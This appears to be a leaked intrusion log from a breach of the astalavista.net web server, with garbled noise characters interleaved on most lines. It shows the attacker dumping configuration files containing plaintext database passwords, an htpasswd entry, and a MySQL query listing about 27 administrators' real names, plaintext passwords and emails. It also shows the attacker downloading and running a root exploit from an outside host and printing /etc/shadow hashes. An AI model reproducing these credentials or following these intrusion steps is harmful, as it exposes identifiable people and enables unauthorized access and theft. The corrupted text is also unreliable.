. z" f- J, p5 y9 N: o# Fdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007/ X/ a4 ?) v# p0 Q, Z, C) c
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
- ]9 A4 U) o- P0 Q1 w- L8 M5 mdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
1 d' D( W/ V* }! W0 Vdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend' [2 \" |" @ o @0 Y9 V- Q
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; Z6 _/ ]$ X+ [' ~5 f9 p! \8 p-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg8 C$ \% _: M* d4 Y; |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config$ ?# s" U% x! h0 |/ D+ Q- N+ b
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron9 y! h6 C/ h$ D
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd r/ L5 h' H& K6 h1 ?" o
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
. e" U5 s! [7 G" k* Q4 E-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico0 H( V# E- p2 Q' Q4 e( \5 o
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed# }/ ^6 t4 o8 X. I. z- @6 P7 F; P
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
, A P: X# O: |6 o" _$ ]8 {% Z-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
3 z! [2 @; n v8 O8 I& H-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
/ s3 w7 a7 f6 h: r; P4 W-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
7 p, a' |: D: k% k-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html8 J1 c/ t& ]; E2 o
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
+ X( F3 _; M7 U1 E* y% d-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php" J9 Z' K* K2 y
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
" E2 p2 o' n2 x9 ` Ydrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc! \, _$ p; ]- ? X. S* m
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
8 |4 ~0 I5 e) \drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
7 k, z" F0 _! U! c$ W4 `drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
0 U3 m5 a% S, ^% Ddrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member% W& \/ R# v4 r, t
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata, ]5 b+ b0 @% ^- I# A& `2 p
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
; k' U ]% m, ~6 b4 S-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
1 ]6 J1 h3 ?( B1 adrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re( G. @8 f7 ?; a0 i z" ~1 d* U
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt: v4 |5 ~1 U! f6 u1 O' t* o# ]3 F
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss" q' t K: X& K/ j; o
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources( }% o2 B6 c0 L, f
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com) P' u. ]( H% r) M
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes! t/ k4 g) r) o E0 b
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src* f+ G: c* |* c, {4 N$ |
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
, l9 r. v0 S3 ]! \% }2 N1 Vdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v25 s }0 h5 ^3 u7 ^' y; \
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old5 X2 ?0 I4 r( |
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
8 n- h7 p3 h* T& H0 a- Y+ G/ o1 Z; _6 gdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki" r+ l- L& k# l. w; m: S6 Y
) \( }9 k& S# L% A- g$ }; J
sh-3.2$ head -20 index.php( p7 {( ?5 e2 F) @( `0 z
<?PHP4 @0 u1 ]$ b$ }$ M0 P
/**
, _8 m6 N0 V! o: g% g; L* Mainfile (external) for astalavistaNET v2.0 F' G6 V5 f( W
*
# A. n" K& s7 h$ m4 V* @copyright Astalavista IT Engineering GmbH
* S+ E& ^' k9 Z9 t( w7 w* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
: E( H) Y$ j" h A/ t- d% C* @version 1.0+ e6 ]/ V1 q4 E; o5 n8 L$ m
*/
1 t' J' p, M3 J& G7 f; Q' v3 l9 W8 e# W1 {
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {, j" }$ F/ Y& ^0 T( J
$dontStartSession = false;! V/ T' H$ i/ H. \* |5 V6 s* h
} else {2 s# K$ |4 J, |3 G+ b+ S/ W: R5 P. \( o' _
$dontStartSession = true;
% s2 R; w- ]9 \: `( R }
7 y& I. h0 G5 H% t2 X0 ` require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);- i0 H/ [2 `8 W/ x* z1 d
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);, A0 w0 W( |( u9 T9 t; j
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);+ K9 l) o. n2 f7 F
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
- m- V/ z" G: P- @* V' ^
! ?9 N! g1 ?( h1 Qsh-3.2$ cd config: |6 E/ a @! i2 b3 }
sh-3.2$ ls -la! a8 Y/ c4 Y+ t2 {8 \$ r7 |
total 32
. ?- Q D$ g" B7 rdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .) O. ?$ q' Y& L/ M2 \2 m
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 Q. |' W2 c6 k9 Q. H$ B1 @) y' r-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php' T* h- p5 U; I, j2 w6 m
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 K. R0 Z8 U0 R+ l& E J
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
" T7 a8 H: o. D! t/ s7 }7 `) K* L-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
4 r3 u9 Q& f6 l( O-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php% W- _! F$ R" J0 M1 Y) B; W, w u
( P* ~8 ]" A7 S0 o+ E
sh-3.2$ cat com.conf.php
0 y& L5 w% r, [. C$ x[snip]/ [8 E# r2 f7 d. n
//member-database
, J! U, s, M0 ?! _8 {7 X3 @$_CONFIG['db_mem_server'] = ‘localhost’;
6 x* O: W8 |- n$ C& z) \% e$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;0 X2 W/ [( y- C3 W2 `) r& U
$_CONFIG['db_mem_user'] = ‘astanet_db’;7 d0 \7 M/ W) x& y) @
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
6 [! |9 t3 H h$_CONFIG['db_mem_debug'] = false; //true or false* A2 I) C3 G4 d; w* P) b
//ads-database
- d& Z% |1 U) H+ g. D& K2 y5 k$_CONFIG['db_ads_server'] = ‘localhost’;, k) o1 Q; h Q& D# P# O
$_CONFIG['db_ads_database'] = ‘astanet_ads’;& F4 q0 K- }; u+ o
$_CONFIG['db_ads_user'] = ‘astanet_db’;$ }5 t+ [! r# H3 }
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;( p3 R% t0 H* I) S
$_CONFIG['db_ads_debug'] = false; //true or false
6 R% O/ r5 }4 _8 Z! k2 j; X//rainbow-database
1 i$ [: N8 K- M+ W: ]$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
3 s- {& ?: [" q" z% B# Z& Z7 b$_CONFIG['db_rainbow_database'] = ‘rainbow’;
7 o5 _! n/ S8 }: |6 Q/ ?0 j# H; Y- b$_CONFIG['db_rainbow_user'] = ‘dinu’;
7 L- c {" K9 n* ]' E3 m1 `$_CONFIG['db_rainbow_password'] = ‘dinudinu’;. E6 i3 X. B/ A/ n6 r+ J
$_CONFIG['db_rainbow_debug'] = false; //true or false
5 S/ H0 C! n8 F//mailing lists database
4 h/ V4 ?# I0 f9 e$ d$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
1 A% Y+ {7 z4 C) e$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;" _1 I/ D F3 ^3 A3 G% ~
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;; k3 Q5 o, I% v: V! }, P
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$ x7 @6 w/ A! [+ v$_CONFIG['db_mailing_lists_debug'] = false; //true or false8 d3 v9 t1 b3 V, D
//paypal
2 c% a/ L- l6 U6 |4 v$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;" @$ U& z+ g& x; C6 b! p
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
+ ^# ~* m' C- d7 D' Q$ j i$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
4 x+ Y8 J" P8 g) m% L3 i$_CONFIG['sub_pp_noship'] = ‘1′;
5 H7 W1 W. `- P7 T" C) ^) Q" R$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
K( a# b+ D4 {6 ?" q$ G0 M# e[snip]
7 C$ e8 s( `% [# {( U1 |: m8 z: [$ g7 ]
sh-3.2$ cd ..1 D5 H9 [$ M9 l5 v/ {6 m$ z
sh-3.2$ cd member
8 e. D: N: C7 h% n, Bsh-3.2$ ls -la* M: `; d: x5 T: V; K
total 20% e+ H% O, e9 n6 |
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
2 t' ?7 T* j. g2 X4 xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 N1 k+ m- v1 S6 E. d L2 y
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
) }4 I( Y8 S5 p+ c& e7 f2 q-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
+ V# |0 [- F' G# lsh-3.2$ cat .htaccess
& U5 J8 t5 q; j' B+ pSecFilterEngine off& W; `7 y8 h' T4 [$ M! X/ \3 d
/ v- [0 V; z: L% gsh-3.2$ cd ..& c0 o: s# N+ y7 T2 P
sh-3.2$ cd cron
: ] Y6 |( ~" M$ vsh-3.2$ ls -la
* O0 U% o) Y4 i- x: Ototal 168
0 e$ x4 U; I3 D, y* Y% P6 rdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .5 f6 ~+ B- K# L: N1 W y. v" W) r
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; h$ k! B4 h% l0 E( t# d
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php/ l7 F# N- d! s5 `
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php5 E4 _+ b4 ~! N, b3 z; Z
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
# i2 ?3 s. M$ c( V. J/ q5 Y# k$ \-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
; G! Q p7 x; c) G& a6 F; T: f7 G-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php2 I4 B1 x4 z. F2 K! g7 {
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
9 E. J3 H+ ^+ s# A5 T5 F-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php1 l" F4 i! T# m0 n& ]
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
, c- O9 c- Q; r$ Z& g-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
. b1 G4 ~4 Y+ X, D8 t2 R-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php: \1 N1 Y5 ~$ H5 T+ r4 T7 `
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
0 f7 P% R. ` q6 C* T-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php+ N1 o k! O1 _
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh% L0 M! W: r$ T' X
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php W5 D( Q4 x$ T* w# y; s% _4 S8 N
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
; R5 e& E' q1 C0 y-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php5 C$ y# g7 \# W6 e$ U
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
& S) u8 U9 l! T% F4 Z2 u-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
- u- _ |! G: L6 A. \drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email3 c7 n/ P2 @; [) p: E: _
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php# K1 S* i' C2 D: M# L
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php" i3 i/ Y' M! B
; W: p/ N( O# a ]( l
sh-3.2$ cd ..
& _; i5 O& b) y! _! ish-3.2$ cd _0078 l8 C! m% D9 t3 j# v M: C* T2 `7 b( z
sh-3.2$ ls -la
. N1 ] N% [( ttotal 24
& R4 u& m% m0 ]5 D0 m Ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ./ H# e" E4 a P, A
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., y0 A! u- M& }2 l" n. i9 d5 h: _
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
! X3 U1 n0 H8 I% w# v' o-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
$ ]; d; [6 A$ \+ }! ^-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php4 E# K' A0 B, c3 \, Z2 M& n7 Y: T
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
( u" p4 M5 u+ M% V# l& p' g A) _* b8 O
sh-3.2$ cat .htaccess0 A }% R3 M8 C$ s1 d+ }
authType Basic; } [+ R+ Q: S' K, l5 B7 q
authName Admin h% o+ i2 V0 J2 e
authUserFile /home/astanet/auth/.htadm_pwd; T" u7 w& u& m) S8 V; A Q
require valid-user/ d L# t- a6 S4 O
2 z* M4 ~: Y3 a/ k9 _
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
8 b" e7 E. Z( ]$ z$ Aadmin2net:CR0bl65MwhfT
: u) q* [- _% `" ]* L4 y, x5 X- N( z: M5 g# l5 X
sh-3.2$ mysql -u astanet_db -p
9 i6 i( J( E$ L- t$ v! D9 i$ mEnter password:
; g& @3 M+ W0 {. Y( j. c+ W2 QWelcome to the MySQL monitor. Commands end with ; or \g.( x! i9 w/ ]9 r& V& @ S. L( z
Your MySQL connection id is 275153
" [* s3 ?5 L* \Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, n& }1 n9 @, w: l0 ~0 T. w
8 C& H: f2 M/ d$ V# {6 A3 KType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.3 `% b+ t1 S, ^3 V' S3 f# f
/ Z/ |7 K/ S4 }, E. k- S* E5 Z
mysql> show databases;
* k9 _' P1 E! z- B3 t! g5 N+———————–+
3 b. _, J0 ?( R+ l* {- C6 f| Database |
9 a& J3 A! k1 T/ \/ j% @+———————–+
% f, A* J6 J8 `& @2 |9 O" R# ?$ r| information_schema |+ Y% q0 h k1 _& Z6 d! h7 t* D
| astanet_ads |2 U9 p2 \7 F& c" W! N
| astanet_mailing_lists |
6 f/ }. J( X0 ^- M* N8 u| astanet_mediawiki |. l2 U( f2 o! i7 H
| astanet_membersystem |2 T0 O# [8 b$ r8 n i
| test | C) Y* m( A) {' {. H( G. w; \, m
+———————–+
$ B' [0 n$ C1 _& L7 q# l3 C/ T6 rows in set (0.00 sec)
, c# b/ {8 ^; _8 m' B4 V3 L
- n- B: b0 b- D9 ?: a, X- c" A! F# zmysql> use astanet_membersystem
5 J4 _3 J$ p/ ^Database changed6 P" Y: O; d# U
mysql> show tables;: l7 L, U+ ]& o3 c7 V3 y' U
+———————————–+
$ E1 i4 s% K! g, w3 ], K| Tables_in_astanet_membersystem |
1 ^9 P0 Q( X3 D( Q2 Z4 @+———————————–+! U$ w* B& R0 n
| blacklist_categories |
: ~0 k. \ d0 c3 n) m+ D) b| blacklist_content |$ _; P; [5 p: Q$ t" f7 d2 ?9 x
| blacklist_levels |
8 {+ }9 J) s1 W" L" f9 d0 n| blacklist_mcset |
; c% ?7 f, V; L/ S/ d. {| dir_categories |0 [3 i& ?$ H- ^2 r/ O) F
| dir_comments |, x% p! w' N1 u: l9 T
| dir_links |/ U! J" ]! r6 r* O
| dir_temp |
7 I% |+ c5 x2 f, h% [% D" a+ p0 U| dir_votes |1 |: J+ D, q' n( i) L4 W
| documents |2 E7 S2 p- _4 a* D; @ t6 f. X
| documents_categories |
& O5 F I$ A# S% D+ y| email_content |: J) t! E8 q. N Q# B ^5 u
| email_settings |
# o" d& r2 i0 E+ P| exploits |8 C$ Z( `" z" d. v* E
| exploits_categories |
`8 E% ^ m1 Q' j! @| exploittree_categories |
! j# ~4 N T4 k) \/ l| exploittree_exploits |
6 C f0 C% O( I5 K" f7 ?| home_values |
. X6 r4 e; ]9 N# q. W| iso_countries |8 n2 @1 u# q# }; M, i
| links_categories |
. f# {7 ]* q- x9 E| links_records |
& j' P! G& F) H8 c1 n7 q' q0 x| links_unauth |
) X) j8 I: j' E4 ]# x \| links_votes |% y- H* U5 b* w+ g
| log |
) g4 _. Q/ H0 l a7 u+ c| news_categories |
1 Q! r! |5 d9 j| news_comments |
0 B" `' Z+ h! Y( @6 Y; o/ X" L) B| news_emoticons |- K g: _9 x! Q) j
| news_latest | W2 l( j# l! x' [5 X! c' ^
| news_messages |
, q0 {; l% j r2 R B. `| news_statistics |+ [8 y7 E9 I" O* |
| news_votes |
1 U7 n2 }- l2 y6 ^ M| prices_content |
: {; X8 g. a" l+ v| prices_offers |
9 Q: N5 v. E! q% q9 I$ B| rss_settings |
3 y8 z2 P3 T0 V3 E \1 V/ n5 Y| sessions |
; a9 O: B& X2 J0 p) O0 s| stats_signups |
" z, o1 r, M# H m5 ]* t| u2u2 |7 N: u. A; @4 i& G- ~+ T0 T5 s
| u2u_contact |2 x5 w# t- k8 `0 F0 D
| u2u_settings |
% l0 B& T5 b8 I) ^9 F) d. N| user_keywords_selected_categories |/ R3 w) b9 \. d- Z0 F+ G* c! @; ^
| users |' D) L) `6 x, U0 N
| users_ipn_test |8 U; a8 k/ D7 h7 H6 ? p
| users_keyword_values |
6 I. C& f4 e' j| users_profile |
P5 U, u7 v5 C| users_temp |, L0 X2 p: u# S
| users_upgrade |
+ P1 }) I; r4 g; W: m/ c+———————————–+
, L+ T } [1 p: J/ ?% O- F0 P/ N46 rows in set (0.00 sec)# | t7 D: M ] z; U
: n3 ]0 V3 n; H" h t+ a/ A( kmysql> describe users;6 j" q3 b. C7 T0 x
+————————–+————————————–+——+—–+———————+—————-+1 N/ b# J8 M" c/ D0 R. @7 j0 y2 I
| Field | Type | Null | Key | Default | Extra |2 R5 e# G) S) N' o/ }* i2 q/ h
+————————–+————————————–+——+—–+———————+—————-+, x% [+ N" n* ^* B7 }/ `+ N1 |/ Z
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |0 F5 t9 R) s( K/ C* ^5 t
| user | varchar(50) | NO | | | |, f2 {5 |2 k. }& G7 X& M( Y
| nickname | varchar(30) | NO | MUL | anonymous | |
% ?" w' U& u6 t| password | varchar(30) | NO | | | |8 D" X; }( n x; ~9 w, }* c3 e4 P
| userlevel | tinyint(3) | YES | MUL | NULL | |
# o ^+ f8 }. ~- [9 z& C( p' B| exp | int(8) unsigned | NO | | 0 | |. Q: a$ B) v5 T2 X. r
| email | varchar(50) | NO | | | |% H, z* u4 q$ q l
| ip | varchar(15) | NO | | 0 | |4 e# x. {7 [3 B
| proxy | set(’0′,’1′) | NO | | 0 | |% X5 W9 D$ `2 Q; u3 N
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
0 Q9 y+ I6 g: ?3 c| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
% I! W; b' w! \1 b9 \3 {9 m| anz_in | tinyint(1) | NO | | -1 | |6 I4 ?! n4 D- \5 p, R' K) x
| status | tinyint(1) unsigned | NO | | 0 | |
2 T8 @4 f R# K# A| checked | set(’0′,’1′,’2′) | NO | | 0 | |- c6 {6 [7 u* l$ }7 ~: E
| freemember | set(’0′,’1′) | NO | | 0 | |5 l8 a9 Y: T+ j5 l8 J! p. w
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
4 D. [" `. [' j* X# u| lang | tinytext | NO | | | |
8 k: s% p0 n1 G- i E| adid | smallint(6) | NO | | 0 | |. O) G% X7 q& C- m# k' F
| pp_txn_id | varchar(255) | YES | | NULL | |
6 ]/ V+ p/ y: b. p( B- D1 n3 L| cnb_transaction_id | varchar(255) | YES | | NULL | |
+ v7 J# K, w; W7 p7 }* B| cnb_order_id | varchar(255) | YES | | NULL | |3 i$ X M* A6 a1 I, } @
| cnb_user_id | int(11) | YES | | 0 | |
' n" U& Y+ a/ Q. E& T; ^: o+————————–+————————————–+——+—–+———————+—————-+
# I9 b- T! _9 C' K6 b, g$ i4 ?% `22 rows in set (0.01 sec)1 f5 [ S( A6 y0 D6 U a! T- U
5 {' L/ u1 i5 q1 p4 Nmysql> select count(*) as skids from users;, _+ }! M; g3 [( B
+——-+
/ w9 [. b* ~$ ]7 J) @| skids |9 L. \# `# j: t0 s! Z8 k
+——-+! N3 c, @8 N) x- f9 m" Z
| 25199 |/ w; l7 C1 B/ @4 I( F" J8 m% ^
+——-+
; g1 E- _/ ?3 u( Z/ X! Q1 row in set (0.00 sec)+ t: E/ t8 H6 ~: w4 I
" p9 \' G' r. B( \0 zmysql> select user,nickname,password,email from users where userlevel = 1;: D, H6 r; v. \+ r
+————————–+———————-+——————+———————————–+& U8 C: o# Y5 O- \+ s
| user | nickname | password | email |
( A: S3 r2 D% B4 E! T+————————–+———————-+——————+———————————–+
3 k# {; i% {8 B| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
$ H8 G9 N; O0 {5 F, M/ O# || Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |* y1 [+ t) V" x S' p
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |& f0 E6 a, U& j3 I- K/ @
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
% Y" _, W' n8 @6 K| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |8 u' B. b2 t1 ?, B# i
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |; g4 m, m" h6 U q& E
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
" n- z3 S( h7 Z/ C9 |6 Q3 X| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |$ ]* L7 `! n6 v. M
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
9 V7 P) F% [. g% C' b0 y6 u/ W$ v| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
0 C e9 o B" A3 ?6 z5 a| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |: O/ P' P: I7 U% _6 ^+ N. D, ~8 K
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
; ~3 R: O/ u2 b0 a" F0 U; F" }| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |' K$ p( | `5 M: y/ O; h
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
) t, x! d* H c8 V( W" l| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |3 Y8 ]9 C6 M: w
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |4 R& E1 o. D5 b, v7 C; R
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
4 `; a# p3 t- J0 v4 |" s2 G7 ~| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |5 r4 ]; a& U6 L9 c8 L" b+ k
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
# P7 D+ d' l; h8 ~# p, ?) ?| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
" y: f. g' [. K| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |+ T0 f$ h) j1 ^' r9 u0 R6 S
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | r' c4 Z4 a+ l# \. \* D+ f
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
" ^7 b0 q& z" S* }& C| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
* k3 u5 x' e* n9 m* `; z0 K _| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |; z+ s9 v" o/ G9 ]6 f' _2 A2 u: J; p
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |7 q+ R# I4 @6 d e) e3 l# {' B
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |) q" I5 K" o' E& T* E
+————————–+———————-+——————+———————————–+) m$ X% d+ H/ [# b5 f5 @8 T& c Z
27 rows in set (0.00 sec)# i. X$ f3 y8 t( p' g, o$ R9 R
/ U" L4 p6 |. y) _
mysql> exit;7 H8 T7 v$ p$ v
Bye
/ n' x! X+ j( O% F8 J) ~8 z3 _
% w2 {+ P+ x! X N% Z[~] plaintext passwords? yes,
I- g! Z; d% j/ q, {3 QThose so called “security professionals” who charge you $6.66 / month to7 o2 e* l- h0 N3 ^
register at their hack-proof portal, save your passwords in plaintext…
% C) }( y! U2 k+ ]) vbrilliant!. E8 a' G" [. G
?) m* ?0 ^' [: U3 L- L N
[~] This been fun but we want more.
; ~4 J- a# U) `" Q5 R |' }( y" X c. E
sh-3.2$ uname -a
|' b$ E5 m0 _2 M1 y. U, ALinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. W& |* @4 {' H$ W
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
8 K1 V! R+ C/ V6 {! J& L0 c5 k' @–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
: Y3 L2 d! H$ T9 D" xResolving anti.sec.labs… 13.33.33.37
- V+ Y4 F3 ]& R& V/ [9 XConnecting to anti.sec.labs|13.33.33.37|:80… connected.
% h' b1 k5 k7 x( g; H$ CHTTP request sent, awaiting response… 200 OK: Y# S4 t' n, o X! @( H
Length: 18200 (18K) [text/plain]! _6 o3 f" N+ T1 I7 c
Saving to: `g0troot’' p) q9 t5 m9 ]$ x6 v9 [
( J4 y4 C; U6 a( S
100%[=========================================================================================================================================>] 18,200 58.6K/s in* y, H( h. q& h- f/ k! S
0.3s
- d9 }0 e0 \, v% B+ j
, i8 l0 J8 j$ N/ D; N+ u4 w18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]% r6 R' Y1 m" Z1 Y* {2 s' A, ]
9 O9 B3 m( O2 H2 v8 R7 qsh-3.2$ ./g0troot -i x86_640 a$ o7 E: ?+ G9 _5 X2 v# Z
[+] g0troot - anti.sec.labs8 O8 ]# A' k* U, X( x% M+ v+ k
[+] Target: 2.6.18-128.1.10.el58 T* z1 H+ ?1 U+ T2 D' b
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]: ?) [$ S _8 Z. l& G
) T% G) x- v) W, ?; M6 f
[+] r00tr00t) ^& G( `5 l: b3 k4 G E
[~] Executing shell…3 E# M9 O$ Y3 O2 D
_# t- H0 U! e, D" z! t
sh-3.2# id
. M R% Z3 j0 r+ x/ ^uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)! W ~) `0 J, g( i; z6 t: m
+ I ]* v8 ]/ ^; i7 xsh-3.2# cat /etc/shadow
" `0 I! P' C1 P i+ [root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::7 d/ U4 E8 R* T, ^1 w! d
[snip]; Y [* d% o' T w
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
w: u/ i# y0 P, \! \jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::- P% v1 N& B' }6 L' N+ ~8 b
